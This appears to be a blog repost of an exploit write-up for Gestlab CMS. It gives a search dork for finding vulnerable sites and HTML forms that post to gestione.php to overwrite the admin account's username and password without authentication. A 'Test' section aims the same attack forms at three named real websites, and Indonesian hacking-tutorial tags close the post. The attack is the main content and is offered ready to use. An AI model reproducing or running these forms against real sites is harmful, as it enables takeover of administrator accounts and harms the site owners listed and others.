» » Gestlab CMS Script Admin User Password Changer Vulnerability

Gestlab CMS Script Admin User Password Changer Vulnerability




Exploit Detail :

# Exploit Title: Gestlab CMS Script Admin User Password Changer
# Date: 2016-09-13
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.clicom.it/
# Version:      All Version
# Drok : "Website by Clicom" or "Questo sito utilizza i cookie."

Exploit :
Admin Panel : http://site/gestlab/
<form method="post" action="http://site/gestlab/gestione.php" enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br> <!-- user id   -->
        user : <input type="text" name="user" value="new username"><br> <!-- new username -->
        pass : <input type="text" name="pass" value="new password"><br> <!-- new password -->
        <input type="submit" name="submit" value="moduser">
</form>

After Show Page or alert go to http://site/gestlab/
now you can login username and password :)
Example :

<form method="post" action="http://site/gestlab/gestione.php" enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br> <!-- user id   -->
        user : <input type="text" name="user" value="meisam"><br> <!-- new username -->
        pass : <input type="text" name="pass" value="meisam"><br> <!-- new password -->
        <input type="submit" name="submit" value="moduser">
</form>
after run this exploit user and pass : meisam
Test :
<form method="post" action="http://eletras.it/gestlab/gestione.php" enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br>
        user : <input type="text" name="user" value="meisam"><br>
        pass : <input type="text" name="pass" value="meisam"><br>
        <input type="submit" name="submit" value="moduser">
</form>
<form method="post" action="http://www.ristoservicesrl.com/gestlab/gestione.php"enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br>
        user : <input type="text" name="user" value="meisam"><br>
        pass : <input type="text" name="pass" value="meisam"><br>
        <input type="submit" name="submit" value="moduser">
</form>
<form method="post" action="http://www.mcm-america.com/gestlab/gestione.php"enctype="multipart/form-data">
        iduser : <input type="text" name="iduser" value="1"><br>
        user : <input type="text" name="user" value="meisam"><br>
        pass : <input type="text" name="pass" value="meisam"><br>
        <input type="submit" name="submit" value="moduser">
</form>
Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,
Share this article please, on :
Share on fb Tweet Share on G+

0 Response to "Gestlab CMS Script Admin User Password Changer Vulnerability"

Post a Comment

Subscribe to: Post Comments (Atom)
Powered by Blogger.